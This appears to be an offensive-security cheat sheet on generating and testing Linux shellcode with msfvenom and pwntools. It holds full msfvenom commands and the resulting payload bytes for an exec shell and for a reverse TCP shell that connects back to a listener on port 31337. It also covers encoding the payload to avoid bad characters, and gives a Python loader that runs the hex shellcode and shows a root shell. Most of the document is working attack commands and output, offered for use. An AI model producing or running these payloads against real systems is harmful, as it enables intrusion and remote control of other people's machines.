SHELLCODING

LISTING PAYLOADS/SHELLCODES

root@oco:~$ msfvenom -l payloads | grep 'linux/x64'
 linux/x64/exec                                      Execute an arbitrary command
 ...SNIP...
 
 * linux/x64/exec runs the command given in CMD on the target; as the bytes generated 
   below show, it does so via execve("/bin/sh", ["/bin/sh", "-c", CMD], NULL).

GENERATING SHELLCODE

Before generating shellcode, make sure it matches the target in three areas:

 * architecture: the CPU type and instruction set (x86, x86_64, ARM, ...). Shellcode is 
   raw machine code and will not execute correctly on a mismatched architecture.
 * platform: the target operating system (Linux, Windows, macOS, ...). Shellcode talks to 
   the OS directly through system calls or API entry points, and those differ between 
   operating systems even on the same CPU.
 * bad characters: bytes that must not appear in the shellcode because the input path 
   would terminate, strip or mangle them; common examples are null bytes (\x00), carriage 
   returns (\x0d), newlines (\x0a) and spaces (\x20). The set depends on how the vulnerable 
   program handles its input, not on the payload, so it has to be determined per target 
   (for instance by sending all 256 byte values through the input and checking which 
   survive) and then passed to the generator.

Getting all three right (architecture, platform, bad characters) is what makes the 
resulting shellcode actually run where it lands.

EXEC SHELLCODE (LINUX/X64)

root@oco:~$ msfvenom -p 'linux/x64/exec' CMD='sh' -a 'x64' --platform 'linux' -f 'hex'
 No encoder specified, outputting raw payload
 Payload size: 42 bytes
 Final size of hex file: 84 bytes
 6a3b589948bb2f62696e2f736800534889e7682d6300004889e652e80300000073680056574889e60f05
 
 * this generic stub is longer than a hand-written execve("/bin/sh") shellcode, and the 
   raw bytes contain \x00 (the terminator after /bin/sh, the upper bytes of push 0x632d, 
   the call displacement and the terminator after "sh"), so it will not survive a 
   string copy unless an encoder is applied

REVERSE SHELL SHELLCODE (LINUX)

UNSAFE:

Raw payload, no bad-character filtering. The \x7f\x00\x00\x01 (LHOST 127.0.0.1) and 
\x02\x00\x7a\x69 (AF_INET, port 31337 in network byte order) pushes below put three 
null bytes in the middle of the shellcode, which is exactly what --bad-chars is for.

root@oco:~$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=127.0.0.1 lport=31337 --platform linux --arch x86 --format c
 No encoder specified, outputting raw payload
 Payload size: 68 bytes
 Final size of c file: 311 bytes
 unsigned char buf[] = 
 "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd"
 "\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x7f\x00\x00"
 "\x01\x68\x02\x00\x7a\x69\x89\xe1\xb0\x66\x50\x51\x53\xb3"
 "\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f"
 "\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

SAFE:

Encoded so that the listed bad characters never appear. --bad-chars makes msfvenom pick 
an encoder (here x86/shikata_ga_nai) and wrap the payload in a decoder stub, which is 
why the size grows from 68 to 95 bytes. Two caveats: the decoder rewrites the payload 
in place, so the memory it lands in must be writable as well as executable; and 
encoding is not evasion, the shikata_ga_nai stub (the \xd9\x74\x24\xf4 fnstenv GetPC 
sequence visible below) is well known. Check the saved bytes against your list anyway.

//SYNTAX
msfvenom -p linux/x86/shell_reverse_tcp lhost=<LHOST> lport=<LPORT> --format c --arch x86 --platform linux --bad-chars "<chars>" --out <filename>

root@oco:~$ msfvenom -p linux/x86/shell_reverse_tcp lhost=127.0.0.1 lport=31337 --format c --arch x86 --platform linux --bad-chars "\x00\x09\x0a\x20" --out shellcode
 Found 11 compatible encoders
 Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
 x86/shikata_ga_nai succeeded with size 95 (iteration=0)
 x86/shikata_ga_nai chosen with final size 95
 Payload size: 95 bytes
 Final size of c file: 425 bytes
 Saved as: shellcode

root@oco:~$ cat shellcode
 unsigned char buf[] = 
 "\xda\xca\xba\xe4\x11\xd4\x5d\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
 "\x12\x31\x50\x17\x03\x50\x17\x83\x24\x15\x36\xa8\x95\xcd\x41"
 "\xb0\x86\xb2\xfe\x5d\x2a\xbc\xe0\x12\x4c\x73\x62\xc1\xc9\x3b"
 <SNIP>

TESTING: RUNNING SHELLCODES

root@sre:~$ nano loader.py
 #!/usr/bin/python3
 # usage: python3 loader.py <hex shellcode>   (the string msfvenom -f hex prints)

 import sys
 from pwn import *

 # os/arch must match the shellcode: pwntools builds a native ELF around the bytes
 context(os="linux", arch="amd64", log_level="error")

 # run_shellcode() wraps the raw bytes in a minimal ELF and spawns it as a child
 # process; interactive() hands the resulting shell to the terminal
 run_shellcode(unhex(sys.argv[1])).interactive()

root@oco:~$ python3 loader.py '6a3b589948bb2f62696e2f736800534889e7682d6300004889e652e80300000073680056574889e60f05'
 $ whoami
    root
